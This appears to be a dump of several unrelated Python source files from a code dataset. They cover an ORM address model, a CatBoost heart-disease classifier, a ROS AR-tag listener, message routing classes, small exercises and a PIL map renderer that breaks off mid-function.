text stringlengths 38 1.54M |
|---|
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy.orm import relationship, backref
from petshop.database import Base
from petshop.cliente.Cliente import Cliente
from typing import Dict
class Endereco(Base):
    """SQLAlchemy model for a client's address (keyed 1:1 to the client)."""

    __tablename__ = "enderecos"

    # The primary key is also a foreign key to the owning client.
    id_cliente = Column(Integer, ForeignKey(Cliente.id_cliente), primary_key=True, autoincrement=True)
    rua = Column(String(100))
    numero = Column(String(20))
    estado = Column(String(30))
    cep = Column('CEP', String(20))
    cidade = Column(String(100))
    bairro = Column(String(100))

    def __repr__(self):
        """Short identification: owning client id plus city."""
        return f"<{self.id_cliente} {self.cidade}>"

    def anonimizar(self) -> None:
        """Clear the street-level fields (city/state columns are left as-is)."""
        for campo in ("rua", "numero", "cep", "bairro"):
            setattr(self, campo, None)

    def to_dict(self, completo=True) -> Dict[str, str]:
        """Serialize the address fields; `completo` is accepted but unused."""
        campos = ("cidade", "rua", "numero", "cep", "bairro")
        return {campo: getattr(self, campo) for campo in campos}
|
# # 9498. 시험성적
# score = int(input())
# A = { 10:"A", 9:"A", 8:"B", 7:"C", 6:"D" }
# if score//10 in A.keys() :
# print(A[(score//10)])
# else:
# print("F")
# # 10817. 세 수
# L = list(map(int,input().split()))
# L.sort()
# print(L[1])
# # 10871. X보다 작은 수
# import sys
# N, X = map(int,sys.stdin.readline().split())
# A = list(map(int,sys.stdin.readline().split()))
# for i in range(N):
# if A[i] < X:
# print(A[i])
# # 1546. 평균
# import sys
# N = int(sys.stdin.readline())
# M = list(map(int, sys.stdin.readline().split()))
# T = 0
# M.sort()
# B = M[N-1]
# for i in range(N):
# M[i] = M[i] / B*100
# T += M[i]
# print(T/N)
# # 4344. 평균은 넘겠지
# import sys
# C = int(sys.stdin.readline())
# F = list(range(C))
# T = 0
# ct = 0
# for i in F:
# ct = 0
# T = 0
# F[i] = list(map(int,sys.stdin.readline().split()))
# for j in range(1, F[i][0]+1):
# T += F[i][j]
# Avg = T/F[i][0]
# for j in range(1, F[i][0]+1):
# if F[i][j] > Avg:
# ct += 1
# F[i] = format(ct/F[i][0]*100, '.3f')
# for i in range(C):
# print(F[i], end ='% \n')
# # 1110. 더하기 사이클
# C = input()
# N = C
# A = 0
# ct = 0
# while True:
# if int(N) < 10:
# N = str(int(N)) + str(int(N))
# ct += 1
# else:
# ct += 1
# A = int(N[0]) + int(N[1])
# if len(str(A)) == 2:
# N = str(N[1]) + str(A)[1]
# else:
# N = str(N[1]) + str(A)
# if int(C) == int(N): break
# print(ct) |
from savannah.core.interpreter import AbstractBaseCommand as Command
from savannah.core.app import App
#
# TODO: add types to the argument parsing to facilitate data processing and separate it from the logic
#
class Run(Command):
    """CLI command that boots the Savannah application from settings.json."""

    verbose_name = 'run'
    help = "Run Savannah with configuration from settings.json"

    def __configure__(self):
        """Register the command-line options.

        NOTE(review): relies on `_types_host` / `_types_port` converters that
        must be defined elsewhere in this module — confirm they exist.
        """
        self.parser.add_argument('-sh', '--serverhost', nargs='?', type=_types_host,
                                 help='CPUServer host. Either \'<host>\' or \'<host>:<port>\'.')
        self.parser.add_argument('-sp', '--serverport', nargs='?', help='CPUServer port.', type=_types_port)
        self.parser.add_argument('--uihost', nargs='?', type=_types_host,
                                 help='User Interface host. Either \'<host>\' or \'<host>:<port>\'. '
                                      'localui must be enabled in settings.')
        self.parser.add_argument('--uiport', nargs='?', type=_types_port, help='User Interface port.')
        self.parser.add_argument('-l', '--logmode', nargs='?',
                                 help=('Indicate log mode. \'brief\' and \'detailed\' save to log files.'
                                       'Log path must be configured in settings. '),
                                 choices=['console', 'brief', 'detailed'])

    @staticmethod
    def action(serverhost: tuple = None, serverport: int = None, uihost: tuple = None, uiport: int= None, logmode=None):
        # The parsed CLI values are currently ignored: App() reads its own
        # configuration (wiring the arguments through is still pending).
        app = App()
        app.start()
__author__ = 'Ofner Mario'
from mao.reporting.structure.reporting_columns import ReportingColumn
class ReportingTable():
    """Describes a report table: a list of ReportingColumn definitions plus an
    optional key column and the header/data row heights."""

    # Key-column bookkeeping: header name and 0-based column index.
    kc_name = None
    kc_index = None

    def __init__(self, column_list=None, key_column=None, header_rowheight=None, data_rowheight=None):
        self.column_list = column_list          # validated by set_column_list
        self.key_column = key_column            # resolved by set_key_column
        self.header_rowheight = header_rowheight
        self.data_rowheight = data_rowheight

    def get_key_column(self):
        """Return a human-readable description of the key column, or None."""
        if self.kc_index is None:
            return None
        return "Name: '" + self.kc_name + "' Index: " + str(self.kc_index)

    def set_key_column(self, value):
        """Select the key column by 0-based index (int) or header name (str).

        Raises AttributeError (kept for caller compatibility) when the value
        does not resolve against the current column_list.
        """
        if value is None:
            self._key_column = None
            self.kc_name = None
            self.kc_index = None
            return
        if isinstance(value, int):
            # BUGFIX: was `value > len(...)`, which let an index equal to the
            # list length through and raised IndexError below instead.
            if self.column_list is None or value >= len(self.column_list):
                raise AttributeError()
            self.kc_index = value
            self.kc_name = self.column_list[value].header_description
        elif isinstance(value, str):
            if self.column_list is None or value not in self.table_header:
                raise AttributeError()
            self.kc_index = [x.header_description for x in self.column_list].index(value)
            self.kc_name = value
        else:
            raise AttributeError()

    def get_column_list(self):
        return self._column_list

    def set_column_list(self, value):
        """Validate and store the column list.

        BUGFIX: accept None (the __init__ default) instead of crashing with
        TypeError while iterating it.
        """
        if value is None:
            self._column_list = None
            return
        if not all(isinstance(col_entry, ReportingColumn) for col_entry in value):
            raise AttributeError
        self._column_list = value

    def get_table_header(self):
        """Header descriptions of all columns, in column order."""
        return [x.header_description for x in self.column_list]

    def get_column_widths(self):
        return [x.column_width for x in self.column_list]

    def get_header_data_format(self):
        return [x.header_data_format for x in self.column_list]

    def get_column_data_format(self):
        return [x.column_data_format for x in self.column_list]

    def get_header_text_format(self):
        return [x.header_text_format for x in self.column_list]

    def get_column_text_format(self):
        return [x.column_text_format for x in self.column_list]

    key_column = property(fget=get_key_column, fset=set_key_column)
    column_list = property(fget=get_column_list, fset=set_column_list)
    table_header = property(fget=get_table_header)
    column_widths = property(fget=get_column_widths)
    header_data_format = property(fget=get_header_data_format)
    column_data_format = property(fget=get_column_data_format)
    header_text_format = property(fget=get_header_text_format)
    column_text_format = property(fget=get_column_text_format)
|
#!/usr/bin/env python
import sys
import rospy
import numpy as np
from tf2_msgs.msg import TFMessage
import tf
import time
import math
from numpy.linalg import inv
from artag_location.msg import AT_Message
#def callback():
# listener = tf.TransformListener()
# print listener
# if not rospy.is_shutdown():
# try:
# (trans,rot) = listener.lookupTransform('/ar_marker_2','/ar_marker_0',rospy.Time(0))
# print trans
# print rot
# except (tf.LookupException, tf.ConnectivityException):
# print('not ok')
if __name__ == '__main__':
    # Node that continuously prints the transform between two AR tags.
    # BUGFIX: the original called an undefined (commented-out) callback(),
    # had a `try` whose `except` was commented out (a SyntaxError), used
    # Python-2 print statements, and left stray triple-quoted strings.
    rospy.init_node('artag_lcoation')
    listener = tf.TransformListener()
    rate = rospy.Rate(10.0)
    # Block until the transform is published at least once.
    listener.waitForTransform('ar_marker_2', 'ar_marker_0', rospy.Time(0), rospy.Duration(4.0))
    while not rospy.is_shutdown():
        try:
            now = rospy.Time.now()
            listener.waitForTransform('ar_marker_2', 'ar_marker_0', rospy.Time(0), rospy.Duration(4.0))
            (trans, rot) = listener.lookupTransform('ar_marker_2', 'ar_marker_0', now)
            print(trans)
        except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
            # Transform not available (yet) at `now` -- retry next cycle.
            continue
        rate.sleep()
|
"""Message object.
"""
import json
import logging
from typing import Dict, List, Optional, Any
from .effects import Effect, EffectStatus, load_effect
from .utils import gen_id, short_id
from .logging import MessageLoggerAdapter
logger = logging.getLogger(__name__)
# Output pipeline effect statuses
ST_NEW = 0 # not started yet
ST_PENDING = 1 # started, wait check etc
ST_APPLIED = 2 # success
ST_FAILED = 3 # fail
class Message:
    """A routed event message.

    Carries an id, event type, payload content, optional metadata and a list
    of Route entries recording per-effect delivery status/state.
    """

    __slots__ = ['id', 'event_type', 'content', 'meta', 'route', 'log']

    id: int
    event_type: str
    content: Dict
    meta: Optional[Dict]
    route: List['Route']
    log: 'MessageLoggerAdapter'

    # pylint: disable=redefined-builtin
    def __init__(self, id=None, event_id=None, event_type=None, content=None,
                 meta=None, route=None):
        """Create a message; requires event_type and either id or event_id."""
        if not event_type:  # pragma: no cover
            raise Exception("Message constructor requires event_type kwarg")
        if not event_id and not id:  # pragma: no cover
            raise Exception(
                "Message constructor requires event_id or id kwarg"
            )
        self.id = id or gen_id(event_id)
        self.event_type = event_type
        self.content = content or {}
        self.meta = meta
        self.route = route or []
        self.log = MessageLoggerAdapter(self)

    @property
    def type(self):
        """Message event type."""
        return self.event_type

    def get_route_status(self, effect):
        """Get actual status of effect; unseen effects are registered PENDING."""
        for route in self.route:
            if route.effect == effect:
                return route.status
        self.route.append(Route(effect, EffectStatus.PENDING))
        return EffectStatus.PENDING

    def set_route_status(self, effect, status):
        """Set effect status, appending a new Route entry when absent."""
        for route in self.route:
            if route.effect == effect:
                route.status = status
                break
        else:
            self.route.append(Route(effect, status))

    def get_route_state(self, effect):
        """Get stored state of effect, or None when the effect has no route."""
        for route in self.route:
            if route.effect == effect:
                return route.state
        return None

    def set_route_state(self, effect, state):
        """Set route state, appending a PENDING Route entry when absent."""
        for route in self.route:
            if route.effect == effect:
                route.state = state
                break
        else:
            self.route.append(Route(effect, EffectStatus.PENDING, state=state))

    def get_route_retry(self, effect):
        """Get number of retries for effect (0 when the effect has no route)."""
        for route in self.route:
            if route.effect == effect:
                return route.retry_count
        return 0

    def set_route_retry(self, effect, retry_count):
        """Set number of retries for route.

        NOTE(review): unlike set_route_status/state, this silently does
        nothing when the effect has no route entry yet.
        """
        for route in self.route:
            if route.effect == effect:
                route.retry_count = retry_count
                return

    def to_dict(self) -> dict:
        """Serialize message to a JSON-friendly dict."""
        return {
            'id': self.id,
            'event_type': self.event_type,
            'content': self.content,
            'meta': self.meta,
            'route': [r.serialize() for r in self.route]
        }

    serialize = to_dict

    @staticmethod
    def from_dict(data: dict) -> 'Message':
        """Load message from provided dict (mutates data['route'] in place)."""
        data['route'] = [
            Route.load(r) for r in data.get('route', [])
        ]
        return Message(**data)

    load = from_dict

    def pretty(self):
        """Pretty print message with route."""
        pretty_routes = '\n'.join([
            route.pretty() for route in self.route
        ])
        lines = [
            "\t",
            "id: %s" % short_id(self.id, right_add=2),
            "type: %s" % self.event_type,
            # BUGFIX: was json.dumps(self.meta, ...) -- copy/paste from the
            # meta line below, so content never appeared in the output.
            "content: %s" % json.dumps(self.content, indent=4),
            "route:\n%s" % pretty_routes,
            "meta: %s" % json.dumps(self.meta, indent=4)
        ]
        return '\n\t'.join(lines)

    def __repr__(self):
        """Instance representation."""
        return "<Message:%s:id=%s>" % (self.event_type, self.id)
class Route:
    """Message route entry.

    Holds an effect, its overall status, arbitrary JSON-serializable state
    and a retry counter.
    """

    __slots__ = ['effect', 'status', 'state', 'retry_count']

    effect: Effect
    status: EffectStatus
    state: Any
    retry_count: int

    def __init__(self,
                 effect: Effect,
                 status: EffectStatus = EffectStatus.PENDING,
                 state=None,
                 retry_count=0) -> None:
        self.effect = effect
        self.status = status
        self.state = state
        self.retry_count = retry_count

    def serialize(self):
        """Pack the route into a JSON-friendly 4-element list."""
        return [
            self.effect.serialize(),
            self.status.value,
            self.effect.serialize_state(self.state),
            self.retry_count,
        ]

    @classmethod
    def load(cls, data) -> 'Route':
        """Inverse of serialize(): rebuild a Route from its list form."""
        effect = load_effect(data[0])
        status = EffectStatus(data[1])
        state = effect.load_state(data[2])
        # Any trailing element (retry_count) is forwarded positionally.
        return cls(effect, status, state, *data[3:])

    def pretty(self):
        """Human-readable row: effect class name, status, then its actions."""
        header = "\t\t%s <%s>" % (self.effect.__class__.__name__,
                                  self.status.name)
        return '\n\t\t\t'.join([header, self.effect.pretty(self.state)])
|
def main():
    """Read a baseline array and two follow-up arrays from stdin, printing
    (for each follow-up) the keys whose multiplicity changed from the
    previous array."""
    n = int(input())  # declared size; only consumed, never used directly
    changed = []
    prev_counts = {}
    prev_arr = list(map(int, input().split()))
    for value in prev_arr:
        prev_counts[value] = prev_counts.get(value, 0) + 1
    for _ in range(2):
        arr = list(map(int, input().split()))
        counts = {}
        for value in arr:
            counts[value] = counts.get(value, 0) + 1
        # Keys of the previous array whose count differs in the current one.
        for key in prev_counts:
            if counts.get(key) != prev_counts.get(key):
                changed.append(key)
        prev_arr = arr
        prev_counts = counts.copy()
    print(changed[0])
    print(changed[1])


if __name__ == '__main__':
    main()
import numpy as np
import pandas as pd
import dill
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.metrics import classification_report
import warnings
warnings.filterwarnings('ignore')
def evaluate_preds(model, X_train, X_test, y_train, y_test):
    """Print train/test classification reports for a fitted model."""
    get_classification_report(y_train, model.predict(X_train),
                              y_test, model.predict(X_test))
def get_classification_report(y_train_true, y_train_pred, y_test_true, y_test_pred):
    """Print sklearn classification reports for train and test splits, then
    the test-set confusion matrix as a pandas crosstab."""
    for label, truth, pred in (('TRAIN', y_train_true, y_train_pred),
                               ('TEST', y_test_true, y_test_pred)):
        print(label + '\n\n' + classification_report(truth, pred))
    print('CONFUSION MATRIX\n')
    print(pd.crosstab(y_test_true, y_test_pred))
# --- Data preparation -------------------------------------------------------
TRAIN_DATASET_PATH = './heart.csv'
df = pd.read_csv(TRAIN_DATASET_PATH)
TARGET_NAME = 'output'
NUM_FEATURE_NAMES = ['age','trtbps', 'chol', 'thalachh']
# Features that get a log10 transform below (presumably skewed -- confirm).
LOG_FEATURE_NAMES = ['oldpeak', 'caa']
CAT_FEATURE_NAMES = ['sex', 'cp', 'fbs', 'restecg', 'exng', 'slp', 'thall']
SELECTED_FEATURE_NAMES = NUM_FEATURE_NAMES + CAT_FEATURE_NAMES +LOG_FEATURE_NAMES
from sklearn.preprocessing import StandardScaler
# Standardize only the plain numeric columns.
scaler = StandardScaler()
df_norm = df.copy()
df_norm[NUM_FEATURE_NAMES] = scaler.fit_transform(df_norm[NUM_FEATURE_NAMES])
df = df_norm.copy()
# log10(x + 1) transform of the skewed columns.
data_norm = df.copy()
data_norm[LOG_FEATURE_NAMES] = np.log10(data_norm[LOG_FEATURE_NAMES] + 1)
df = data_norm.copy()
# Persist the transformed dataset, then read it back in.
UPDATED_DATASET_PATH = './new_train.csv'
df.to_csv(UPDATED_DATASET_PATH, index=False, encoding='utf-8')
TRAIN_DATASET_PATH = './new_train.csv'
df = pd.read_csv(TRAIN_DATASET_PATH)
# After the transform, the log columns are treated as plain numeric features.
NUM_FEATURE_NAMES = ['age','trtbps', 'chol', 'thalachh', 'oldpeak', 'caa']
CAT_FEATURE_NAMES = ['sex', 'cp', 'fbs', 'restecg', 'exng', 'slp', 'thall']
SELECTED_FEATURE_NAMES = NUM_FEATURE_NAMES + CAT_FEATURE_NAMES
X = df[SELECTED_FEATURE_NAMES]
y = df[TARGET_NAME]
# Stratified 70/30 split, fixed seed for reproducibility.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, shuffle=True, random_state=21, stratify=y)
#save test
X_test.to_csv("X_test.csv", index=None)
y_test.to_csv("y_test.csv", index=None)
#save train
X_train.to_csv("X_train.csv", index=None)
y_train.to_csv("y_train.csv", index=None)
# --- Model training ---------------------------------------------------------
from catboost import CatBoostClassifier
# Baseline CatBoost model.
model_catb = CatBoostClassifier(silent=True, random_state=21,
                                cat_features=CAT_FEATURE_NAMES,
                                # one_hot_max_size=7
                                )
model_catb.fit(X_train, y_train)
# Class-imbalance ratio used to weight the minority class.
disbalance = y_train.value_counts()[0] / y_train.value_counts()[1]
model_catb = CatBoostClassifier(silent=True, random_state=21,
                                cat_features=CAT_FEATURE_NAMES,
                                class_weights=[1, disbalance]
                                )
model_catb.fit(X_train, y_train)
# Fixed hyperparameters shared by the grid search and the final model.
frozen_params = {
    'class_weights':[1, disbalance],
    'silent':True,
    'random_state':21,
    'cat_features':CAT_FEATURE_NAMES,
    'eval_metric':'F1',
    'early_stopping_rounds':20
}
model_catb = CatBoostClassifier(**frozen_params)
params = {'iterations':[100, 200, 500, 700, 1500],
          'max_depth':[3, 5, 7]}
cv = StratifiedKFold(n_splits=3, random_state=21, shuffle=True)
grid_search = model_catb.grid_search(params, X_train, y_train, cv=cv, stratified=True, refit=True)
# NOTE(review): the search space uses the key 'max_depth' but the result is
# read back as 'depth' -- confirm catboost normalizes the alias, otherwise
# this raises KeyError.
dpth = grid_search['params']['depth']
iterns = grid_search['params']['iterations']
final_model = CatBoostClassifier(**frozen_params, iterations=iterns, max_depth=dpth)
final_model.fit(X_train, y_train, eval_set=(X_test, y_test))
# evaluate_preds prints its reports and returns None, so this prints 'None'.
print(evaluate_preds(final_model, X_train, X_test, y_train, y_test))
# Persist the fitted model with dill.
with open("ml_pipeline.dill", "wb") as f:
    dill.dump(final_model, f)
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 14 01:59:25 2021
@author: Dominikus Edo Kristian - 20083000121
"""
# Interactive grade lookup: loops until the user answers T/t at the retry
# prompt. Prompts/messages are intentionally kept in Indonesian.
jwb = "y"
while jwb=="y" or jwb=="Y":
    print ("==========================")
    print(" CEK NILAI HURUF")
    print ("==========================")
    n=0
    while int(n)>=0 and int(n)<=100:
        n = input("Masukkan Nilai = ")  # read the score (kept as a string)
        if int(n)>=0 and int(n)<=100:
            # Map the numeric score to a letter grade.
            if int(n)>=91:
                nilai ="A"
            elif int(n)>=81:
                nilai ="B"
            elif int(n)>=71:
                nilai ="C"
            else:
                nilai ="D"
            print (nilai)
            jwb = input("Cek Ulang? Y/T = ")  # ask whether to check again
            if jwb=="t" or jwb=="T":
                break
        else:
            # Out-of-range input: show the valid range and restart the menu.
            pesan="Masukkan nilai 0-100"
            print(pesan)
            break
|
from PIL import Image
import sys
# multi_im = ["sikuliximage-1506129382287.png","sikuliximage-1506129382603.png","sikuliximage-1506129382921.png","sikuliximage-1506129383237.png"]
# Python 2 script: diff two screenshots and classify up to 10 arrow glyphs.
im1 = Image.open(sys.argv[1])
#im1 = Image.open("sikuliximage-1506185019606.png")
pixelMap = im1.load()
im2 = Image.open(sys.argv[2])
#im2 = Image.open("sikuliximage-1506185019938.png")
pixelMap2 = im2.load()
# Build a black/white difference mask: black where the two screenshots
# agree, white where they differ.
img = Image.new( im1.mode, im1.size)
pixelsNew = img.load()
for i in range(img.size[0]):
    for j in range(img.size[1]):
        if pixelMap[i,j] == pixelMap2[i,j]:
            pixelsNew[i,j] = (0,0,0)
        else:
            pixelsNew[i,j] = (255,255,255)
response = ""
#img.show()
# Reference glyphs for the four arrow keys -- presumably cropped earlier
# from the same UI (TODO confirm the file/arrow mapping, esp. 'd' = 6.png).
img_a = Image.open("0.png")
pxl_a = img_a.load()
img_s = Image.open("1.png")
pxl_s = img_s.load()
img_w = Image.open("2.png")
pxl_w = img_w.load()
img_d = Image.open("6.png")
pxl_d = img_d.load()
pxl_list = [pxl_a, pxl_s, pxl_w, pxl_d]
arrow_list = ['a','s','w','d']
# Scan up to 10 equal-width slots left to right; classify each slot by the
# reference glyph with the fewest mismatching pixels.
for n in range(10):
    w = img.size[0]
    h = img.size[1]
    w2 = int(img.size[0]/10)
    w3 = w2 * 1
    # Crop the middle horizontal band (40%-80%) of slot n, full height.
    region = (w3*n+int(w2*0.4), 0, w3*n+int(w2*0.8), h)
    cropImg = img.crop(region)
    pixel_crop = cropImg.load()
    #cropImg.show()
    #cropImg.save("%d.png"%(n),"PNG")
    # Count black pixels; fewer than 15 means the slot is empty -> stop.
    line_count = 0
    for i in range(cropImg.size[0]):
        for j in range(cropImg.size[1]):
            if pixel_crop[i,j][0] == 0:
                line_count = line_count + 1
    if line_count < 15:
        break
    # Nearest-reference classification by per-pixel mismatch count.
    score = 10000
    ans = ''
    for k in range(4):
        pixel_diff = 0
        for i in range(cropImg.size[0]):
            for j in range(cropImg.size[1]):
                if pixel_crop[i,j][0] != pxl_list[k][i,j][0]:
                    pixel_diff = pixel_diff + 1
        if pixel_diff < score:
            score = pixel_diff
            ans = arrow_list[k]
    response += ans
print response
|
from PIL import Image
from mapImages import makeMapImage,getImage,getDraaiing,getColor,getShape
import os
import shutil
#
# Hier komt de code voor het genereren van die rij
#
# resize alle afbeeldingen van de map naar een 100,100 formaat
# NOTE(review): `global` statements at module level are no-ops; they only
# document which names the functions below share via `global`.
global listOfMapItems
global rijen
global kolommen
global xMax
global yMax
global pathToDraw
pathToDraw = ["[]"]  # "[]" is the sentinel constructLine treats as "no path"
global roaming
roaming = False      # True while a '$'-separated roaming segment is drawn
def makeMap(positionList="", path=1):
    """Render mapimages/map.jpg: base map, targets and (optionally) paths.

    `path` is 1 (draw no paths) or a '$'-separated string of path segments;
    a '$' in it marks the segments as "roaming" while they are drawn.
    """
    global pathToDraw
    global roaming
    if not os.path.exists("mapimages/kaart.txt"):
        # No map definition available: fall back to the placeholder image.
        shutil.copy2(r'mapimages/NOMAP.jpg', r'mapimages/map.jpg')
        return
    makeEmpMap()
    setTargetsOnMap(positionList)
    if path != 1:
        roaming = '$' in path
        pathToDraw = path.split("$")
        for segment in pathToDraw:
            constructLine(str(segment))
        roaming = False
def makeEmpMap():
    """Build the empty base map image (mapimages/map.jpg) from the textual
    map description in mapimages/kaart.txt, and return its cleaned lines.

    Python 2 code (uses `xrange` and integer division). The kaart.txt layout
    is inferred from the parsing below: a header line "<cols> <rows>",
    then one line per map row of 2-char tile codes (digit 0-7 + orientation
    N/E/S/W), then per-image lines "<pos><rot>..._<color>_<shape>.".
    """
    global listOfMapItems
    global rijen
    global kolommen
    global xMax
    global yMax
    # NOTE(review): the file handle is never closed.
    kaartFile = open(r"mapimages/kaart.txt", 'r')
    allLines = kaartFile.readlines()
    # Strip comment lines ('#'), blank lines and lines starting with a space.
    binaryLock = 1
    counter = 0
    while (binaryLock == 1):
        if (counter == len(allLines)):
            break
        if (allLines[counter][0] == "#" or allLines[counter] == "\n" or allLines[counter][0] == " "):
            del allLines[counter]
        else:
            counter += 1
    # Parse the column count: digits up to the first space of the header.
    kolommen = allLines[0][0]
    hulpcounter = 1
    while (allLines[0][hulpcounter] != " "):
        kolommen += allLines[0][hulpcounter]
        hulpcounter+=1
    # Parse the row count: remaining digits of the header line.
    rijen = ""
    listOfMapItems = []
    while (len(allLines[0]) - 2 > hulpcounter):
        rijen += allLines[0][hulpcounter+1]
        hulpcounter += 1
    # Collect the 2-character tile codes (type digit + orientation letter),
    # three columns of text per tile.
    for x in range(0,int(rijen)):
        for y in range(0, int(kolommen)):
            try:
                if(allLines[x+1][2] != 'i'):
                    listOfMapItems.append(allLines[x+1][y*3] + allLines[x+1][y*3+1])
            except:
                # Bare except kept as-is: short/ragged lines are skipped.
                pass
    onthoudX = x + 1            # index of the last map row read
    beginImagesX = onthoudX + 1  # first line of the image section
    listOfMapPictures = []
    xMax = int(kolommen)
    yMax = int(rijen)
    # Load and orient the tile image for every map cell.
    for x in range(0,int(rijen)*int(kolommen)):
        try:
            if( listOfMapItems[x][0] == "0"):
                picture = Image.open("mapimages/0N.jpg")
            if( listOfMapItems[x][0] == "1"):
                picture = Image.open("mapimages/1N.jpg")
            if( listOfMapItems[x][0] == "2"):
                picture = Image.open("mapimages/2N.jpg")
            if( listOfMapItems[x][0] == "3"):
                picture = Image.open("mapimages/3N.jpg")
            if( listOfMapItems[x][0] == "4"):
                picture = Image.open("mapimages/4N.jpg")
            if( listOfMapItems[x][0] == "5"):
                picture = Image.open("mapimages/5N.jpg")
            if( listOfMapItems[x][0] == "6"):
                picture = Image.open("mapimages/6N.jpg")
            if( listOfMapItems[x][0] == "7"):
                picture = Image.open("mapimages/7N.jpg")
            # Resize to the 100x100 grid cell and rotate to the orientation.
            if(listOfMapItems[x][1] == "N"):
                picture = picture.resize((100,100))
            if(listOfMapItems[x][1] == "E"):
                picture = picture.resize((100,100))
                picture = picture.rotate(-90)
            if(listOfMapItems[x][1] == "W"):
                picture = picture.resize((100,100))
                picture = picture.rotate(90)
            if(listOfMapItems[x][1] == "S"):
                picture = picture.resize((100,100))
                picture = picture.rotate(180)
            listOfMapPictures.append(picture)
        except:
            pass
    # Remember the per-tile overlay images (translated from Dutch:
    # "Onthouden van de afbeeldingen").
    for x in range(beginImagesX, len(allLines)):
        if (allLines[x][1] == "?" or allLines[x][2] == "?"):
            pass
        elif( allLines[x][1] != "N" and allLines[x][1] != "W" and allLines[x][1] != "S" and allLines[x][1] != "E"):
            # Two-digit tile position followed by the rotation letter.
            plaatsAfbeelding = allLines[x][0] + allLines[x][1]
            draaiing = allLines[x][2]
            y = 10
            color = ""
            while (allLines[x][y] != "_"):
                color += allLines[x][y]
                y += 1
            y += 1
            shape = ""
            while (allLines[x][y] != "."):
                shape += allLines[x][y]
                y += 1
            makeMapImage(plaatsAfbeelding, draaiing, color, shape)
        else:
            # Single-digit tile position variant (fields start one char earlier).
            plaatsAfbeelding = allLines[x][0]
            draaiing = allLines[x][1]
            y = 9
            color = ""
            while (allLines[x][y] != "_"):
                color += allLines[x][y]
                y += 1
            y += 1
            shape = ""
            while (allLines[x][y] != "."):
                shape += allLines[x][y]
                y += 1
            makeMapImage(plaatsAfbeelding, draaiing, color, shape)
    #creates a new empty image, RGB mode, and size rows*100, columns * 100.
    new_im = Image.new('RGB', (int(kolommen)*100,int(rijen)*100))
    #Iterate through a rows bij columns grid with 100 spacing, to place my image
    for i in xrange(0,int(kolommen)*100,100):
        for j in xrange(0,int(rijen)*100,100):
            # Convert pixel coordinates back to grid indices.
            if (i != 0):
                rescaledI = i/100
            else:
                rescaledI = i
            if (j != 0):
                rescaledJ = j/100
            else:
                rescaledJ = j
            try:
                im = listOfMapPictures[rescaledJ*int(kolommen) + rescaledI]
                #Here I resize my opened image, so it is no bigger than 100,100
                im.thumbnail((100,100))
                new_im.paste(im, (i,j))
                getImage(rescaledJ * int(kolommen) + rescaledI)
                if (getImage(rescaledJ * int(kolommen) + rescaledI)):
                    # Overlay the tile's extra image, offset by orientation.
                    plaats = rescaledJ * int(kolommen) + rescaledI
                    imageUrl = "mapimages/" + getColor(plaats) + "_" + getShape(plaats) + "." + "png"
                    im = Image.open(imageUrl)
                    im.thumbnail((40,40))
                    if(getDraaiing(plaats) == "W"):
                        new_im.paste(im, (i,j+35))
                    if(getDraaiing(plaats) == "N"):
                        new_im.paste(im, (i+35,j))
                    if(getDraaiing(plaats) == "E"):
                        new_im.paste(im, (i+60,j+35))
                    if(getDraaiing(plaats) == "S"):
                        new_im.paste(im, (i+35,j+70))
                else:
                    new_im.paste(im, (i,j))
            except:
                pass
    ## new_im.show()
    new_im.save(r'mapimages/map.jpg')
    return allLines
def setTargetsOnMap(positionList):
    """Paste a rotated target marker per team onto mapimages/map.jpg.

    `positionList` is a whitespace-separated sequence of alternating tokens:
    "<team> <tileNr><orientation> ...". Python 2 code: the `/` divisions
    below rely on integer division for grid math -- under Python 3 they
    would produce floats and break Image.paste offsets.
    """
    global xMax
    global yMax
    gesplitsteLijst = positionList.split()
    kaart = Image.open("mapImages/map.jpg", 'r')
    pixelsX, pixelsY = kaart.size
    widthSquare = pixelsX/xMax
    heightSquare = pixelsY/yMax
    i=0
    while (i < len(gesplitsteLijst)):
        team = gesplitsteLijst[i]
        tegelMetOrientatie = gesplitsteLijst[i+1]
        Orientatie = tegelMetOrientatie[-1]   # trailing N/E/S/W letter
        tegelNr = int(tegelMetOrientatie[:-1])
        # Tile number -> 1-based grid column/row.
        x = (tegelNr%xMax) + 1
        y = (tegelNr/xMax) + 1
        # Center of the tile, in pixels.
        xValue = widthSquare/2 + (x-1)*widthSquare
        yValue = heightSquare/2 + (y-1)*heightSquare
        target = Image.open('target-small-' + team + '.png')
        # East is the unrotated orientation of the marker image.
        if (Orientatie == 'N'):
            target = target.rotate(90)
        elif (Orientatie == 'W'):
            target = target.rotate(180)
        elif (Orientatie == 'S'):
            target = target.rotate(270)
        targetX, targetY = target.size
        #target.convert('RGBA')
        offset = (xValue-targetX/2, yValue-targetY/2)
        # Use the alpha channel of the marker as the paste mask.
        kaart.paste(target, offset, target.convert('RGBA'))
        i += 2
    kaart.save("mapimages/map.jpg")
def constructLine(listOfLocationTuples):
    """Draw one path onto mapimages/map.jpg as thick colored segments.

    `listOfLocationTuples` is the *string* form of a list of (row, col)
    tuples, e.g. "[(0, 1), (0, 2)]"; "[]" means nothing to draw. Segments
    are red while the module-global `roaming` flag is set, dark green
    otherwise. Python 2 code (print statements below).
    """
    global roaming
    if (listOfLocationTuples == "[]"):
        return
    picture = Image.open("mapimages/map.jpg")
    #(width, height) = picture.size
    # Hand-rolled parse of the tuple-list string back into integers.
    tijdelijk1 = listOfLocationTuples.split(', ')
    tijdelijk2 = []
    tijdelijk2.append(int(tijdelijk1[0][2:]))      # strip leading "[("
    i = 1
    while (i < len(tijdelijk1)-1):
        tijdelijk2.append(int(tijdelijk1[i][:-1]))   # strip trailing ")"
        tijdelijk2.append(int(tijdelijk1[i+1][1:]))  # strip leading "("
        i += 2
    tijdelijk2.append(int(tijdelijk1[-1][:-2]))    # strip trailing ")]"
    print tijdelijk2
    # Re-pair the flat number list into (row, col) tuples.
    i = 0
    locationTuples = []
    while (i<len(tijdelijk2)):
        locationTuples.append((tijdelijk2[i],tijdelijk2[i+1]))
        i += 2
    print locationTuples
    pix = picture.load()
    newListRows = []
    newListColumns = []
    for i,j in locationTuples:
        newListRows.append(i)
        newListColumns.append(j)
    # Paint a 10px-wide bar between each consecutive pair of tiles (grid
    # cells are 100x100 px; +50 centers the bar in the cell).
    for x in range(0,len(newListRows)):
        try:
            if (newListRows[x] - newListRows[x+1] == 0):
